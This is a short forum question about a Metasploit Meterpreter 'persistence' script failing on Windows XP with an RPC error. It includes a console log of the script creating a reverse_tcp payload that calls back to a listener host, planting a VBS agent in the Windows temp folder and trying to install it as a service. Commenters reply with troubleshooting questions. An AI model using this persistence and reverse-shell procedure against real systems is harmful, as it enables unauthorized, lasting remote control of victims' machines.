# Meterpreter RPC error

Tags: metasploit, windows-xp

How to solve this error?

```
meterpreter > run persistence -S -i 7 -p 4444 -r 192.168.134.129
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/COMNETSE-D36FBE_20210415.4611/COMNETSE-D36FBE_20210415.4611.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.134.129 LPORT=4444
[*] Persistent agent script is 99683 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\NtgeNU.vbs
[*] Executing script C:\WINDOWS\TEMP\NtgeNU.vbs
[+] Agent executed with PID 328
[*] Installing as service..
[*] Creating service CdhZxNNBUhtRuF
[-] Could not execute persistence: RuntimeError Unable to open service manager: The RPC server is unavailable.
```

I followed this https://youtu.be/cqSkJ5wOoms

Comment: And when you use the more recent and recommended command? That video is 10 years old ...

Comment: Have you googled the error? Have you checked to see if the RPC service is running?

Comment: For a helpful answer it will be very useful to list what you have attempted so far to investigate and correct.